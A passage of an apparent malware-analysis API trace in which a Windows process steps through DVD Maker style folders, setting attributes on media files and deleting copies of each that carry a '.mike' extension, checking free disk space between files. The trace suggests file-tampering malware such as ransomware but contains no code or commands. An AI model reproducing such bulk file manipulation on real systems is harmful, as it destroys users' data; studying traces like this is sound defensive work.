Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x5e [0055.136] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x5e [0055.136] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x5e [0055.136] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0055.136] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground_pal.wmv.mike")) returned 1 [0055.138] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.153] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv", dwFileAttributes=0x80) returned 0 [0055.154] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground.wmv.mike")) returned 1 [0055.155] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.170] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0055.171] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground_pal.wmv.mike")) returned 1 [0055.173] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.189] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv", dwFileAttributes=0x80) returned 0 [0055.189] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground.wmv.mike")) returned 1 [0055.190] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.204] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0055.204] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground_pal.wmv.mike")) returned 1 [0055.205] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.208] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG", dwFileAttributes=0x80) returned 0 [0055.208] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\lightbluerectangle.png.mike")) returned 1 [0055.210] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.214] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png", dwFileAttributes=0x80) returned 0 [0055.214] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\mainmenubuttonicon.png.mike")) returned 1 [0055.216] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.219] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png", dwFileAttributes=0x80) returned 0 [0055.220] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\navsubpicture.png.mike")) returned 1 [0055.221] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.225] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png", dwFileAttributes=0x80) returned 0 [0055.225] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_leftarrow.png.mike")) returned 1 [0055.226] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.230] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png", dwFileAttributes=0x80) returned 0 [0055.230] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_rightarrow.png.mike")) returned 1 [0055.231] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.236] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png", dwFileAttributes=0x80) returned 0 [0055.236] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_uparrow.png.mike")) returned 1 [0055.237] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0055.237] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0055.237] CoTaskMemFree (pv=0x4e1c10) [0055.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0055.245] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.248] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png", dwFileAttributes=0x80) returned 0 [0055.249] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-background.png.mike")) returned 1 [0055.250] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.254] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png", dwFileAttributes=0x80) returned 0 [0055.254] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-highlight.png.mike")) returned 1 [0055.255] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.261] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png", dwFileAttributes=0x80) returned 0 [0055.261] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-image-mask.png.mike")) returned 1 [0055.262] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.267] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png", dwFileAttributes=0x80) returned 0 [0055.267] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\babypink.png.mike")) returned 1 [0055.269] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.275] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png", dwFileAttributes=0x80) returned 0 [0055.276] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\background.png.mike")) returned 1 [0055.278] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.296] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv", dwFileAttributes=0x80) returned 0 [0055.297] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2.wmv.mike")) returned 1 [0055.298] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.316] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv", dwFileAttributes=0x80) returned 0 [0055.316] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2_pal.wmv.mike")) returned 1 [0055.318] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.347] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv", dwFileAttributes=0x80) returned 0 [0055.347] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6.wmv.mike")) returned 1 [0055.349] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.376] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv", dwFileAttributes=0x80) returned 0 [0055.376] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6_pal.wmv.mike")) returned 1 [0055.379] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.383] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png", dwFileAttributes=0x80) returned 0 [0055.383] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-back-static.png.mike")) returned 1 [0055.385] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.388] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png", dwFileAttributes=0x80) returned 0 [0055.388] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-next-static.png.mike")) returned 1 [0055.390] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.393] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png", dwFileAttributes=0x80) returned 0 [0055.394] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-previous-static.png.mike")) returned 1 [0055.395] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.399] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png", dwFileAttributes=0x80) returned 0 [0055.399] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\button-highlight.png.mike")) returned 1 [0055.401] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.406] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png", dwFileAttributes=0x80) returned 0 [0055.406] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\chapters-static.png.mike")) returned 1 [0055.407] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.476] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png", dwFileAttributes=0x80) returned 0 [0055.476] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-background.png.mike")) returned 1 [0055.480] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.487] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png", dwFileAttributes=0x80) returned 0 [0055.487] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-foreground.png.mike")) returned 1 [0055.489] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.496] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png", dwFileAttributes=0x80) returned 0 [0055.496] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\curtains.png.mike")) returned 1 [0055.498] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.506] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv", dwFileAttributes=0x80) returned 0 [0055.506] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte.wmv.mike")) returned 1 [0055.509] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.519] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv", dwFileAttributes=0x80) returned 0 [0055.519] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte_pal.wmv.mike")) returned 1 [0055.521] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.537] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv", dwFileAttributes=0x80) returned 0 [0055.537] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_matte.wmv.mike")) returned 1 [0055.539] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.554] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv", dwFileAttributes=0x80) returned 0 [0055.554] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_matte_pal.wmv.mike")) returned 1 [0055.556] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.573] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv", dwFileAttributes=0x80) returned 0 [0055.573] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb.wmv.mike")) returned 1 [0055.575] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.601] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv", dwFileAttributes=0x80) returned 0 [0055.601] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb_pal.wmv.mike")) returned 1 [0055.603] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.607] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png", dwFileAttributes=0x80) returned 0 [0055.607] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\highlight.png.mike")) returned 1 [0055.608] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, 